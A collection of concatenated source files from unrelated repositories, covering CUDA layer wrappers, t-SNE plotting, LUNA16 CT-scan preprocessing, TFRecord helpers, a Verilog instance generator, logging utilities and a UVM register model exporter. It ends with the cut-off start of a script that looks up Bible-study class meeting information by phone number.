unoptimized_cuda.UNOPTIMIZED_LINEAR(input, weight, temp, out)
return out
def conv2d(input, weight, bias, stride, padding):
if len(stride) == 1:
strides_h = stride[0]
strides_w = stride[0]
else:
strides_h = stride[0]
strides_w = stride[1]
out_height = int((input.size(2) - weight.size(2)) / strides_h +1)
out_width = int((input.size(3) - weight.size(3)) / strides_w +1)
out = torch.zeros([input.size(0), weight.size(0), out_height, out_width], dtype=torch.float, device=torch.device('cuda:0'))
if bias is not None:
unoptimized_cuda.UNOPTIMIZED_CONV(input, weight, bias, out, stride, padding )
else:
temp = torch.zeros([weight.size(0)], dtype=torch.float, device=torch.device('cuda:0'))
unoptimized_cuda.UNOPTIMIZED_CONV(input, weight, temp, out, stride, padding )
return out
```
#### File: GhostShiftAddNet/tsne_vis/visual_tsne.py
```python
import numpy as np
import gzip
# import cPickle
import pickle as cPickle
import argparse
#Import scikitlearn for machine learning functionalities
import sklearn
from sklearn.manifold import TSNE
parser = argparse.ArgumentParser(description='PyTorch TSNE Plot')
parser.add_argument('--save_dir', type=str, default='resnet20_shiftadd_FIX8', help='path to save directory')
parser.add_argument('--scratch', action='store_false', help='whether generate output_2d from scratch')
parser.add_argument('--dim_3d', action='store_true', help='whether to show 3D perspective')
args = parser.parse_args()
save_dir = args.save_dir
font_board = 2
output = np.load(save_dir + '/output.npy').astype(np.float32)
# data = np.load(save_dir + '/data.npy')
target = np.load(save_dir + '/target.npy')
# print('data shape: ', data.shape)
print('target shape: ', target.shape)
print('output shape: ', output.shape)
if not args.dim_3d:
if args.scratch:
output_2d = TSNE(perplexity=30).fit_transform(output)
np.save(save_dir + '/output_2d.npy', output_2d) #, allow_pickle=False)
else:
output_2d = TSNE(perplexity=30).fit_transform(output)
output_2d = np.load(save_dir + '/output_2d.npy')
target = target.reshape(target.shape[0])
import matplotlib.pyplot as plt
import matplotlib.patheffects as pe
fig = plt.figure(figsize=(8,6))
# ax = plt.subplot(aspect='equal')
ax = fig.add_subplot(1,1,1)
sc = ax.scatter(output_2d[:, 0], output_2d[:, 1], lw=0, s=10, c=target)
# Add the labels for each digit.
txts = []
for i in range(10):
# Position of each label.
xtext, ytext = np.median(output_2d[target == i, :], axis=0)
txt = ax.text(xtext, ytext, str(i), fontsize=24)
txt.set_path_effects([pe.Stroke(linewidth=5, foreground="w"), pe.Normal()])
txts.append(txt)
ax.spines['bottom'].set_linewidth(font_board)
ax.spines['bottom'].set_color('black')
ax.spines['left'].set_linewidth(font_board)
ax.spines['left'].set_color('black')
ax.spines['top'].set_linewidth(font_board)
ax.spines['top'].set_color('black')
ax.spines['right'].set_linewidth(font_board)
ax.spines['right'].set_color('black')
ax.set_xticks([])
ax.set_yticks([])
plt.savefig(save_dir + '/{}_output_2d.svg'.format(save_dir), bbox_inches='tight')
else:
# 3D
if args.scratch:
output_3d = TSNE(perplexity=30, n_components=3).fit_transform(output)
np.save(save_dir + '/output_3d.npy', output_3d) #, allow_pickle=False)
else:
output_3d = np.load(save_dir + '/output_3d.npy')
target = target.reshape(target.shape[0])
output_3d_1 = output_3d[target==4, :]
output_3d_2 = output_3d[target==7, :]
output_3d = np.vstack((output_3d_1, output_3d_2))
target_1 = target[target==4]
target_2 = target[target==7]
target = np.vstack((np.expand_dims(target_1, axis=1), np.expand_dims(target_2, axis=1)))
target = target.reshape(target.shape[0])
print(output_3d.shape)
print(target.shape)
import matplotlib.pyplot as plt
import matplotlib.patheffects as pe
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111, projection='3d')
color = ['#440154', '#482878', '#3E4989', '#31688E', '#26828E', '#1F9E89', '#35B779', '#6ECE58', '#B5DE2B', '#FDE725']
def get_color(target):
_color = []
for i in range(target.shape[0]):
_color.append(color[target[i]])
return np.array(_color)
sc = ax.scatter(output_3d[:, 0], output_3d[:, 1], output_3d[:, 2], lw=0, s=10, c=get_color(target))
# ax.spines['bottom'].set_linewidth(font_board)
# ax.spines['bottom'].set_color('black')
# ax.spines['left'].set_linewidth(font_board)
# ax.spines['left'].set_color('black')
# ax.spines['top'].set_linewidth(font_board)
# ax.spines['top'].set_color('black')
# ax.spines['right'].set_linewidth(font_board)
# ax.spines['right'].set_color('black')
ax.set_xticklabels([])
ax.set_yticks([])
ax.set_zticklabels([])
# ax.set_zticks([])
# ax.grid()
# Add the labels for each digit.
txts = []
for i in range(10):
# Position of each label.
if output_3d[target == i, :].shape[0] > 10:
print(i)
xtext, ytext, ztext = np.median(output_3d[target == i, :], axis=0)
txt = ax.text(xtext, ytext, ztext, str(i), fontsize=24)
txt.set_path_effects([pe.Stroke(linewidth=5, foreground="w"), pe.Normal()])
txts.append(txt)
# ax.legend()
# plt.show()
plt.savefig(save_dir + '/{}_output_3d_4_7.svg'.format(save_dir), bbox_inches='tight')
``` |
{
"source": "JiabinTan/LUNA16",
"score": 3
} |
#### File: LUNA16/data_proc/reader_disp.py
```python
import SimpleITK as sitk
import numpy as np
#!/usr/bin/python2.6
# -*- coding: utf-8 -*-
import os
import matplotlib.pyplot as plt
from PIL import Image
import pandas as pd
import sys
'''python import模块时, 是在sys.path里按顺序查找的。
sys.path是一个列表,里面以字符串的形式存储了许多路径。
使用A.py文件中的函数需要先将他的文件路径放到sys.path中
'''
sys.path.append('..//')
from Config.Config import Config as conf
'''
读取图像相关数据
输入:
图像数据路径
输出:
图像数据、原点、缩放因子
'''
def load_image(filename):
image=sitk.ReadImage(filename)
numpy_image=sitk.GetArrayFromImage(image)
numpy_origin=np.array(list(reversed(image.GetOrigin())))
numpy_spacing=np.array(list(reversed(image.GetSpacing())))
return numpy_image,numpy_origin,numpy_spacing
'''
读取候选区数据
输入:候选区文件路径
输出:pd的数据类型,可以直接使用pandas进行相关处理
'''
def read_csv(filename):
lines=[]
lines=pd.read_csv(filename)
return lines
'''
坐标转换
输入:候选区坐标、原点、缩放因子
输出:对应的image数组中的index
'''
def coord_convert(worldcood,origin,spacing):
stretched_voxel_coord=np.absolute(worldcood-origin)
voxel_coord=stretched_voxel_coord/spacing
return voxel_coord
#正规化CT图(范围0-1)
def normalize_planes(ct_image):
maxHU=400#人体组织正常的HU应该是在这个范围之下
minHU=-1000#空气的HU
normalized_image=(ct_image-minHU)/(maxHU-minHU)
normalized_image[normalized_image>1]=1
normalized_image[normalized_image<0]=0
return normalized_image
'''
这边是对2D来说的,把候选区的位置在图片上框出来
输入:图片数据,x,y坐标,框的半径、框的厚度
输出:加入框的图片数据
'''
def draw_box(data,y,x,radius=30,pad=2):
data[max(0, y - radius):min(data.shape[0], y + radius),\
max(0, x - radius - pad):max(0, x - radius)] = 3000
data[max(0, y - radius):min(data.shape[0], y + radius),\
min(data.shape[1], x + radius):min(data.shape[1], x + radius + pad)] = 3000
data[max(0, y - radius - pad):max(0, y - radius),\
max(0, x - radius):min(data.shape[1], x + radius)] = 3000
data[min(data.shape[0], y + radius):min(data.shape[0], y + radius + pad),\
max(0, x - radius):min(data.shape[1], x + radius)] = 3000 # 横线
return data
if __name__=='__main__':
#image_path=conf.CT_dir+'1.3.6.1.4.1.14519.5.2.1.6279.6001.105756658031515062000744821260.mhd'
#1.3.6.1.4.1.14519.5.2.1.6279.6001.108197895896446896160048741492
image_path=conf.CT_dir+'1.3.6.1.4.1.14519.5.2.1.6279.6001.108197895896446896160048741492.mhd'
csv_path=conf.scv_dir+'candidates.csv'
image,origin,spacing=load_image(image_path)
#为了后面的batch处理,这边需要对origin、和spacing进行维度处理
origin=origin[np.newaxis]
spacing=spacing[np.newaxis]
print("=======image info=====")
print('size:',image.shape)
print('origin:',origin)
print('spacing:',spacing)
candidates=read_csv(csv_path)
#print('====candidates samples====')
#for i in range(conf.batch_size+1):
# print(candidates[i])
# pass
start=15647
#9313
#16051
cand=candidates.loc[15645:15654]
cand=np.asarray(cand)
world_coord=np.asarray([cand[:,3],cand[:,2],cand[:,1]],dtype=float).T
print(world_coord)
print(coord_convert(world_coord,origin,spacing))
voxel_coord=np.rint(coord_convert(world_coord,origin,spacing)).astype(int)
for i in range(0,conf.batch_size):
#patch=image
plt.clf()
image_no_cut=np.copy(image[voxel_coord[i][0]])#避免引用传参
plt.hist(image_no_cut.flatten(), bins=80, color='c')
plt.show()
new_image=draw_box(image_no_cut,voxel_coord[i][1],voxel_coord[i][2],radius=10,pad=2)
plt.title(str(cand[i][4]))
plt.imshow(new_image,cmap='gray')
plt.show()
#numpyImage, numpyOrigin, numpySpacing = load_image(image_path)
#print(numpyImage.shape)
#print(numpyOrigin)
#print(numpySpacing)
#cands = read_csv(csv_path)
##这边要注意candidate的数据要跟我的读取的文件对应
#for cand in cands[9315:9317]:
# worldCoord = np.asarray([float(cand[3]),float(cand[2]),float(cand[1])])
# voxelCoord = np.rint(coord_convert(worldCoord, numpyOrigin, numpySpacing)).astype(int)
# voxelWidth = 64
# patch = numpyImage[voxelCoord[0],voxelCoord[1]-32:voxelCoord[1]+32,voxelCoord[2]-32:voxelCoord[2]+32]
# patch = normalize_planes(patch)
# print(worldCoord)
# print(voxelCoord)
# print(patch)
# plt.imshow(patch, cmap='gray')
# plt.show()
```
#### File: LUNA16/data_proc/TFRecord_proc.py
```python
import tensorflow as tf
import numpy as np
'''
读写tfrecord文件
'''
class TFRecord(object):
'''
写入tfrecord数据
输入:
data数组,
label数组
dir保存路径
输出:
保存文件
'''
def writer(data,label,dir):
writer = tf.python_io.TFRecordWriter(dir)
for index,value in enumerate(data):
img_raw = value.tostring()
example = tf.train.Example(features=tf.train.Features(feature={
"label": tf.train.Feature(int64_list=tf.train.Int64List(value=[label[index]])),
'img_raw': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw]))
}))
writer.write(example.SerializeToString()) #序列化为字符串
pass
writer.close()
pass
'''
tfrecord读取器
输入:
tfrecords_filename 需要读取的文件名list
is_batch=False 是否是batch输出,测试的时候输出一个就好方便一点,最好记录下单个输出跟多个输出的不同,比如输出数据在维度上的区别
is_shuffle=False 是否打乱,训练的时候打乱,valid跟test的时候不打乱
batch_size=32 batch的大小
z_size=36 z的大小
y_size=48 y的大小
x_size=48 x的大小
'''
def reader(tfrecords_filename,is_batch=False,is_shuffle=False,batch_size=32,z_size=36,y_size=48,x_size=48):
filename_queue = tf.train.string_input_producer(tfrecords_filename)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue) #返回文件名和文件
features = tf.parse_single_example(serialized_example,
features={
'label': tf.FixedLenFeature([], tf.int64),
'img_raw' : tf.FixedLenFeature([], tf.string),
})
img = tf.decode_raw(features['img_raw'], tf.int16)
img = tf.reshape(img, [z_size, y_size, x_size])
label = tf.cast(features['label'], tf.int64)
if (is_batch):
if (is_shuffle):
img_batch, label_batch = tf.train.shuffle_batch([img, label],
num_threads=5,
batch_size=batch_size,
capacity=3000,
min_after_dequeue=1000)
else:
img_batch, label_batch = tf.train.batch([img,label],
batch_size=batch_size,
num_threads=5,
capacity=3000
)
pass
else:
return img,label
return img_batch, label_batch
pass
``` |
{
"source": "jiacaiyuan/uvm-generator",
"score": 3
} |
#### File: auto_instance/version_2/rtl_generator.py
```python
import re
import argparse
import os
class Rtl_generator:
def __init__(self):
self.extract_list=[]
self.info_list=[]
self.module_name = None
@staticmethod
def display_list_for_test(list_name):
print('list :\n')
for unit in list_name:
print(unit)
def get_module_specified_lines(self,regex,file_name):
print('input function: get_module_specified\n')
with open(file_name,'r') as file_obj:
add_flag = 0
for line in file_obj:
line = line.strip()
if not line.startswith('//'):
re_head_obj = re.match(regex,line)
re_tail_obj = re.match(r'endmodule',line)
if re_head_obj is not None:
add_flag = 1
elif add_flag == 1 and re_tail_obj is not None:
add_flag = 0
break
else:
continue
if add_flag == 1:
self.extract_list.append(line)
def extract_ports_info(self,regex_ports, regex_width):
print('input function: get_ports_info\n')
for unit in self.extract_list:
re_ports_obj = re.search(regex_ports,unit)
if re_ports_obj is not None:
port_name = re_ports_obj.group(6)
port_direction = re_ports_obj.group(1)
port_width_str = re_ports_obj.group(4)
if port_width_str is None:
port_width = 1
else:
#port_width = port_width_str
width_str = re.search(regex_width,port_width_str).group(2)
width_info_list = width_str.split(":")
high_str = width_info_list[0]
low_str = width_info_list[1]
if '-1' in high_str:
port_width = high_str.split("-")[0]
else:
high = int(high_str)
low = int(low_str)
port_width = high - low + 1 if high >= low else low - high + 1
port_info = {'name':port_name,'direct':port_direction,'width':port_width}
self.info_list.append(port_info)
def gen_module_instance(self,filename,mode):
print('input function: gen_module_instance')
ports_num = len(self.info_list)
line_list = []
line_list.append('module wrapper();')
if mode == 'gen_inst_wc':
for i in range(ports_num):
var_type = 'reg' if self.info_list[i]['direct'] == 'input' else 'wire'
line_list.append('{:<5} [{}-1:0] {};'.format(var_type,
self.info_list[i]['width'],
self.info_list[i]['name']))
line_list.append('\n')
line_list.append('{} inst_name'.format(self.module_name))
line_list.append('(')
index = 0
for unit in self.info_list:
if index == ports_num - 1:
post_fix = '//{:<15}width:{}'.format(unit['direct'], unit['width'])
else:
post_fix = ',//{:<15}width:{}'.format(unit['direct'], unit['width'])
index+=1
if mode == 'gen_inst_wc':
line_list.append('.{:<30}{:<30}{}'.format(unit['name'], '('+unit['name']+')', post_fix))
elif mode == 'gen_inst_only':
line_list.append('.{:<30}{:<5}{}'.format(unit['name'], '(' + ')', post_fix))
line_list.append(');')
line_list.append('endmodule\n')
for line in line_list:
print(line)
#with open(filename,'w') as file_obj:
# for line in line_list:
# file_obj.write(line)
# file_obj.write('\n')
#print('generate instance finish')
```
#### File: uvm-generator/generator/debug_log.py
```python
import sys
import logging
#setting the config about the log
def log_cfg(log_level=1,log_fil=""):#the level is small the debug is more
#DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
DATE_FORMAT = "%m/%d/%Y %H:%M:%S" #the data format
LOG_FORMAT="%(asctime)s\t%(levelname)s:%(message)s" #the debug format
#LOG_FORMAT="%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s"
if log_level==0:#level setting
log_level=logging.DEBUG
elif log_level==1:
log_level=logging.INFO
elif log_level==2:
log_level=logging.WARNING
elif log_level==3:
log_level=logging.ERROR
elif log_level==4:
log_level=logging.CRITICAL
else:#default
log_level=logging.INFO#default is info
if log_fil!="": #log into the file
formater=logging.Formatter(LOG_FORMAT)
logger=logging.getLogger()
logger.setLevel(log_level)
#standard out
stream_handler=logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(formater)
#file out
file_handler=logging.FileHandler(log_fil)
file_handler.setFormatter(formater)
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
#logging.basicConfig(filename=log_fil, level=log_level, format=LOG_FORMAT,datefmt=DATE_FORMAT)
#only has log but no stdout
else:#log into the std
logging.basicConfig(level=log_level, format=LOG_FORMAT,datefmt=DATE_FORMAT)
#--------------------------------------------------------
#Decorator demo
#--------------------------------------------------------
#def log(func):
# def wrapper(*args, **kw):
# print('call %s():' % func.__name__)
# return func(*args, **kw)
# return wrapper
#def log(text):
# def decorator(func):
# def wrapper(*args, **kw):
# print('%s %s():' % (text, func.__name__))
# return func(*args, **kw)
# return wrapper
# return decorator
#using the decorator for debug each function
def DEBUG(text=""):
def decorator(func):
def wrapper(*args, **kw):
if text!="":
logging.debug(str(" ")+func.__name__+str(": ")+str(text))
else:
logging.debug(str(" ")+func.__name__)
#logging.log(logging.DEBUG,string)
return func(*args, **kw)
return wrapper
return decorator
#def DEBUG(string):
# logging.debug(str(" ")+str(string))
# #logging.log(logging.DEBUG,string)
# return
#version 1
def INFO(string):#the info log
logging.info(str(" ")+string)
#logging.log(logging.INFO,string)
return
def WARNING(string):#the warning log
logging.warning(str(" ")+string)
#logging.log(logging.WARNING,string)
return
def ERROR(string):#the error log
logging.error(str(" ")+string)
#logging.log(logging.ERROR,string)
return
def CRITICAL(string):#the critical log
logging.critical(str(" ")+string)
#logging.log(logging.CRITICAL,string)
return
#version 2
#def INFO(string):#the info log
# print(str(" ")+string)
# return
#
#def WARNING(string):#the warning log
# print(str(" ")+string)
# return
#
#
#def ERROR(string):#the error log
# print(str(" ")+string)
# return
#
#
#def CRITICAL(string):#the critical log
# print(str(" ")+string)
# return
```
#### File: ralbot/uvmgen/exporter.py
```python
import os
from systemrdl.node import AddressableNode, RootNode
from systemrdl.node import AddrmapNode, MemNode
from systemrdl.node import RegNode, RegfileNode, FieldNode
from . import typemaps
#===============================================================================
class uvmGenExporter:
def __init__(self, **kwargs):
self.indent = kwargs.pop("indentLvl", " ")
self.uvmRegContent = list()
self.uvmMemContent = list()
self.uvmRegBlockContent = list()
self._max_width = None
# Check for stray kwargs
if kwargs:
raise TypeError("got an unexpected keyword argument '%s'" % list(kwargs.keys())[0])
self.filename = ""
self.dirname = "."
self.isSwReadable = True
self.isSwWriteable = True
self.isRclr = False
self.isRset = False
self.isWoset = False
self.isWoclr = False
#---------------------------------------------------------------------------
# def export(self, node, path):
# # Make sure output directory structure exists
# if os.path.dirname(path):
# os.makedirs(os.path.dirname(path), exist_ok=True)
# self.dirname = os.path.split(path)[0]
# filename = os.path.basename(path)
# filename = os.path.splitext(filename)[0]
# self.filename = filename + "_uvmreg.sv"
# filename = self.filename.upper().replace('.', '_')
# self.genDefineMacro(filename)
# print("dir="+str(self.dirname)+" filname="+str(self.filename))#jcyuan
#---------------------------------jcyuan comment
def export(self, node, path,filename):
# Make sure output directory structure exists
if not os.path.exists(path):
os.makedirs(path)
self.dirname=path
if(".sv" not in filename):
self.filename = filename+"_uvmreg.sv"
else:#has ".sv"
self.filename = filename
filename = self.filename.upper().replace('.', '_')
self.genDefineMacro(filename)
#--------------------------------------------jcyuan add
# If it is the root node, skip to top addrmap
if isinstance(node, RootNode):
node = node.top
if not isinstance(node, AddrmapNode):
raise TypeError("'node' argument expects type AddrmapNode. Got '%s'" % type(node).__name__)
# Determine if top-level node should be exploded across multiple
# addressBlock groups
explode = False
if isinstance(node, AddrmapNode):
addrblockable_children = 0
non_addrblockable_children = 0
for child in node.children():
if not isinstance(child, AddressableNode):
continue
if isinstance(child, (AddrmapNode, MemNode)) and not child.is_array:
addrblockable_children += 1
else:
non_addrblockable_children += 1
if (non_addrblockable_children == 0) and (addrblockable_children >= 1):
explode = True
# Do the export!
if explode:
# top-node becomes the memoryMap
# Top-node's children become their own addressBlocks
for child in node.children():
if not isinstance(child, AddressableNode):
continue
self.add_addressBlock(child)
else:
# Not exploding apart the top-level node
# Wrap it in a dummy memoryMap that bears it's name
# Export top-level node as a single addressBlock
self.add_addressBlock(node)
# Write out UVM RegModel file
self.uvmRegBlockContent.append("`endif")
with open(os.path.join(self.dirname, self.filename), "w") as f:
f.write('\n'.join(self.uvmRegContent + self.uvmMemContent + self.uvmRegBlockContent))
#---------------------------------------------------------------------------
def genDefineMacro(self, tag):
self.uvmRegContent.append("`ifndef __%s__" % tag)
self.uvmRegContent.append("`define __%s__" % tag)
#---------------------------------------------------------------------------
def add_uvm_block_content(self, indentLvl="", content=""):
self.uvmRegBlockContent.append(indentLvl + content)
#---------------------------------------------------------------------------
def add_uvm_reg_content(self, indentLvl="", content=""):
self.uvmRegContent.append(indentLvl + content)
#---------------------------------------------------------------------------
def add_uvm_mem_content(self, indentLvl="", content=""):
self.uvmMemContent.append(indentLvl + content)
#---------------------------------------------------------------------------
def add_addressBlock(self, node):
self._max_width = None
regNode = list()
regBlockNode = list()
memNode = list()
for child in node.children():
if isinstance(child, RegNode):
self.add_register(node, child)
regNode.append(child);
elif isinstance(child, (AddrmapNode, RegfileNode)):
self.add_registerFile(node, child)
regBlockNode.append(child)
elif isinstance(child, MemNode):
self.add_memFile(node, child)
memNode.append(child)
# Width should be known by now
# If mem, and width isn't known, check memwidth
if isinstance(node, MemNode) and (self._max_width is None):
self._max_width = node.get_property("memwidth")
allNodes = regNode + regBlockNode + memNode
self.add_uvm_block_content(content="class %s extends uvm_reg_block;" % node.inst_name)
self.add_variable_declare_func(node, allNodes)
self.add_uvm_block_content('''
`uvm_object_utils(%s)
function new(string name = "%s");
super.new(name, UVM_NO_COVERAGE);
endfunction ''' %(node.inst_name, node.inst_name))
self.add_build_func(node, allNodes)
#---------------------------------------------------------------------------
def add_registerFile(self, parent, node):
self._max_width = None
regNode = list()
regBlockNode = list()
memNode = list()
for child in node.children():
if isinstance(child, RegNode):
self.add_register(node, child)
regNode.append(child);
elif isinstance(child, (AddrmapNode, RegfileNode)):
self.add_registerFile(node, child)
regBlockNode.append(child)
elif isinstance(child, MemNode):
self.add_memFile(node, child)
memNode.append(child)
allNodes = regNode + regBlockNode + memNode
self.add_uvm_block_content(content="class %s extends uvm_reg_block;" % self.get_class_name(parent, node))
self.add_variable_declare_func(node, allNodes)
self.add_uvm_block_content('''
`uvm_object_utils(%s)
function new(string name = "%s");
super.new(name, UVM_NO_COVERAGE);
endfunction ''' %(self.get_class_name(parent, node), self.get_class_name(parent, node)))
self.add_build_func(node, allNodes)
#---------------------------------------------------------------------------
def add_register(self, parent, node):
if self._max_width is None:
self._max_width = max(node.get_property("accesswidth"), node.get_property("regwidth"))
else:
self._max_width = max(node.get_property("accesswidth"), node.get_property("regwidth"), self._max_width)
self.add_uvm_reg_content(content = "class %s extends uvm_reg;" % self.get_class_name(parent, node))
for field in node.fields():
self.add_uvm_reg_content(self.indent, "rand uvm_reg_field %s;" % field.inst_name);
self.add_uvm_reg_content(self.indent, "")
self.add_uvm_reg_content(self.indent, "virtual function void build();")
for field in node.fields():
isRand = "1" if field.is_sw_writable else "0"
isVolatile = "1" if field.is_volatile else "0"
self.setSwRdWrProperty(field)
self.add_uvm_reg_content(self.indent*2, "%s = uvm_reg_field::type_id::create(\"%s\", null, get_full_name());" % (field.inst_name, field.inst_name))
self.add_uvm_reg_content(self.indent*2, "%s.configure(this, %0d, %0d, \"%s\", %s, %s, %s, %s);" %(field.inst_name, field.width, field.low, self.getFieldAccessType(field), isVolatile, self.resetStr(field), isRand, self.isOnlyField(node)))
self.add_uvm_reg_content(self.indent, "endfunction")
self.add_uvm_reg_content('''
function new(string name = "%s");
super.new(name, %0d, UVM_NO_COVERAGE);
endfunction
`uvm_object_utils(%s)
endclass\n''' %(self.get_class_name(parent, node), node.get_property("regwidth"), self.get_class_name(parent, node)))
#---------------------------------------------------------------------------
# generate uvm reg model content function
#---------------------------------------------------------------------------
def add_variable_declare_func(self, parent, allNodes):
for child in allNodes:
if child.is_array:
for dim in child.array_dimensions:
self.add_uvm_block_content(self.indent, "rand %s %s[%0d];" %(self.get_class_name(parent, child), child.inst_name, dim));
else:
self.add_uvm_block_content(self.indent, "rand %s %s;" %(self.get_class_name(parent, child), child.inst_name));
def add_build_func(self, parentNode, allNodes):
self.add_uvm_block_content(self.indent, "")
self.add_uvm_block_content(self.indent, "virtual function void build();")
self.add_uvm_block_content(self.indent*2, "default_map = create_map(\"default_map\", `UVM_REG_ADDR_WIDTH'h0, %0d, UVM_LITTLE_ENDIAN, 1);" % (self._max_width/8))
for child in allNodes:
if isinstance(child, RegNode):
self.add_build_reg_content(parentNode, child)
elif isinstance(child, (AddrmapNode, RegfileNode)):
self.add_build_block_content(parentNode, child)
elif isinstance(child, MemNode):
self.add_build_mem_content(parentNode, child)
self.add_uvm_block_content(self.indent, "endfunction")
self.add_uvm_block_content(content="endclass\n")
def add_build_reg_content(self, parentNode, child):
if child.is_array:
self.add_uvm_block_content(self.indent*2, "foreach (this.%s[i]) begin" %child.inst_name)
self.add_uvm_block_content(self.indent*3, "%s[i] = %s::type_id::create($psprintf(\"%s[%%d]\",i));" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].configure(this, null, \"%s[i]\");" % (child.inst_name, child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*3, "default_map.add_reg(%s[i], `UVM_REG_ADDR_WIDTH'h%x+i*`UVM_REG_ADDR_WIDTH'h%x, \"%s\", 0);" % (child.inst_name, child.raw_address_offset, child.array_stride, self.getRegAccessType(child)))
self.add_uvm_block_content(self.indent*2, "end")
else:
self.add_uvm_block_content(self.indent*2, "%s = %s::type_id::create(\"%s\");" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.configure(this, null, \"%s\");" % (child.inst_name, child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*2, "default_map.add_reg(%s, `UVM_REG_ADDR_WIDTH'h%x, \"%s\", 0);" % (child.inst_name, child.address_offset, self.getRegAccessType(child)))
def add_build_block_content(self, parentNode, child):
if child.is_array:
self.add_uvm_block_content(self.indent*2, "foreach (this.%s[i]) begin" %child.inst_name)
self.add_uvm_block_content(self.indent*3, "%s[i] = %s::type_id::create($psprintf(\"%s[%%d]\",i), , get_full_name());" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].configure(this, \"\");" % (child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*3, "default_map.add_submap(%s[i].default_map, `UVM_REG_ADDR_WIDTH'h%x+i*`UVM_REG_ADDR_WIDTH'h%x);" % (child.inst_name, child.raw_address_offset, child.array_stride))
self.add_uvm_block_content(self.indent*2, "end")
else:
self.add_uvm_block_content(self.indent*2, "%s = %s::type_id::create(\"%s\",,get_full_name());" %(child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.configure(this, \"\");" %(child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*2, "default_map.add_submap(%s.default_map, `UVM_REG_ADDR_WIDTH'h%x);" % (child.inst_name, child.address_offset))
def add_build_mem_content(self, parentNode, child):
self.add_uvm_block_content(self.indent*2, "%s = %s::type_id::create(\"%s\",,get_full_name());" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.configure(this, \"%s\");" %(child.inst_name, child.inst_name))
self.add_uvm_block_content(self.indent*2, "default_map.add_mem(%s.default_map, `UVM_REG_ADDR_WIDTH'h%x, \"%s\");" % (child.inst_name, child.address_offset, typemaps.access_from_sw(child.get_property("sw"))))
def add_memFile(self, parent, node):
self.add_uvm_mem_content(content = "class %s extends uvm_reg;" % self.get_class_name(parent, node))
self.add_uvm_mem_content('''
function new(string name = \"%s\");
super.new(name, 'h%x, %0d, "%s", UVM_NO_COVERAGE);
endfunction
`uvm_object_utils(%s)
endclass\n''' % (self.get_class_name(parent, node), node.get_property("mementries"), node.get_property("memwidth"), typemaps.access_from_sw(node.get_property("sw")), self.get_class_name(parent, node)))
#---------------------------------------------------------------------------
# utilities function
#---------------------------------------------------------------------------
#---------------------------------------------------------------------------
def get_class_name(self, parent, node):
regBlockName = parent.inst_name
regName = node.inst_name
prefixString = "reg_"
if isinstance(node, RegNode):
prefixString = "reg_"
elif isinstance(node, (AddrmapNode, RegfileNode)):
prefixString = "block_"
elif isinstance(node, MemNode):
prefixString = "mem_"
return prefixString + regBlockName.lower() + "_" + regName.lower()
def resetStr(self, node):
reset = node.get_property("reset")
if reset is not None:
return "'h%x, " % reset + "1"
else:
return "0, 0"
def isOnlyField(self, node):
i = 0;
for field in node.fields():
i += 1;
return "1" if (i == 1) else "0"
#set other sw read/write properties (these override sw= setting)
def setSwRdWrProperty(self, node):
self.isRclr = False
self.isRset = False
self.isWoclr = False
self.isWoset = False
if node.get_property("rclr"):
self.isSwReadable = True
self.isRclr = True
elif node.get_property("rset"):
self.isSwReadable = True
self.isRset = True
elif node.get_property("woclr"):
self.isSwWriteable = True
self.isWoclr = True
elif node.get_property("woset"):
self.isSwWriteable = True
self.isWoset = True
def getFieldAccessType(self, node):
accessMode = "RO"
if self.isRclr:
if self.isWoset:
accessMode = "W1SRC"
elif node.is_sw_writable:
accessMode = "WRC"
else:
accessMode = "RC"
elif self.isRset:
if self.isWoclr:
accessMode = "W1CRS"
elif node.is_sw_writable:
accessMode = "WRS"
else:
accessMode = "RS"
else:
if self.isWoclr:
accessMode = "W1C"
elif self.isWoset:
accessMode = "W1S"
elif node.is_sw_writable:
if node.is_sw_readable:
accessMode = "RW"
else:
accessMode = "WO"
return accessMode
def getRegAccessType(self, node):
accessMode = "RO"
if node.has_sw_writable:
if node.has_sw_readable:
accessMode = "RW"
else:
accessMode = "WO"
else:
accessMode = "RO"
return accessMode
``` |
{
"source": "jiachen247/BSF-Harvester",
"score": 2
} |
#### File: jiachen247/BSF-Harvester/app.py
```python
import os
import urllib2
import ssl
from datetime import datetime
import json
import time
DEFAULT_GET_DELAY_SECONDS = 2
FRIST_NUMBER = [8,9]
HTTP_URL_FORMAT = "https://www.bsfinternational.org/BSFAjaxUtils/Dispatch?action=AjaxGetClassMeetingInfo&searchByPhone=true&phoneNumber={}".format
PATH_DUMP = "./DUMP"
PATH_DUMP_BK_FORMAT ="./DUMP-{}.bak".format
FILE_DUMP_PATH_FORMAT = (PATH_DUMP + "/{}.{}.bsf").format
FILE_DUMP_HEADERS_FORMAT = ("===================================\n"
" Generated with BSF_HARVESTER\n"
" @nehcaij\n"
" {}\n\n"
" No: {}\n"
" Name: {}\n"
" Desc: {}\n"
" Church: {}\n"
" Address: {}\n"
" Day: {}\n"
" Time: {}\n"
"===================================\n\n").format
HTTP_HEADERS = {
"Host": "www.bsfinternational.org",
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"Referer": "https://www.bsfinternational.org/lessons",
